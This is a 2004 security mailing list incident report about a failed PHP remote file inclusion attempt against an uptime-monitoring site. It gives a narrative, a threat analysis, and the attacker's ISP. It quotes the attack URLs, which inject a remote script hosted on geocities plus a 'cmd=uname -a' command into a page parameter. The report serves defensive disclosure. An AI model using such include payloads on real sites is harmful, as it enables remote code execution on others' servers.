Security Incidents mailing list archives

PHP injection attempt from 200.222.244.154

From: Kirby Angell <kangell () alertra com>
Date: Sat, 20 Nov 2004 15:23:04 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SOA: 20041120 14:34 CST
EOA: 20041120 14:34 CST

ATTACK-IP: 200.222.244.154/Linux/Brazil (A1)
TARGET-IP: 204.249.195.250 (V1)

Summary

This attack was an attempt to get a malcious PHP script run on the
victim through a common PHP coding error. The web server's page in this
case was not susceptible to the attack and a 302 Not Found error was
returned.

The attacker IP was banned from the Alertra network to prevent future
attempts to compromise the network.

Narrative

The attacker IP made 4 attempts to exploit a common coding error found
in PHP applications. The flaw involves injecting a malicious URL into a
variable that the given PHP page later uses in an 'include' statement.
In all attempts, the given page was not susceptible to the attack and
therefore a 302 Not Found error was returned.

In the first attempt, the attacker tried:

http://uptime.alertra.com/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

The rest of the attempts the attacker tried:

http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

We see these attacks fairly often and they are usually not remarkable.
However, this one utilized attacks against two different pages. The odd
thing is that the pages are actually just different versions of the same
page. "uptime3" now redirects to "uptime.php". This is the second attack
of this style, featuring the same PHP injection vector. The first was
from 209.67.223.70.

This attack has been reported to the originating ISP, Telemar Norte
Leste S.A. See: response.

Threat Analysis

There doesn't seem to be any evidence of a prior crawling of the victim
web site. If it were an automated program that had been trolling for
victims, I would have expected it to just try "/uptime.php." Since it
tried both the old and new pages, it is possible that this is an
individual attacker that has done some research on the victim and then
tried a couple of different attacks. Arguing against that is the time
between attacks is small, likely meaning this was an automated process.

Most likely this was an automated process fed with search engine data on
PHP pages and not a specific attack on the victim.

- --
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBn7W421unUZAE9MARAuCfAJ0cv34v0LQW7AKGBSTfHaRBFkv3VACghmh8
T0qfvXzNFweZhdjHEL//KR8=
=qeSX
-----END PGP SIGNATURE-----

Current thread:

PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 22)
- RE: PHP injection attempt from 200.222.244.154 KEM Hosting (Nov 23)
- Re: PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 24)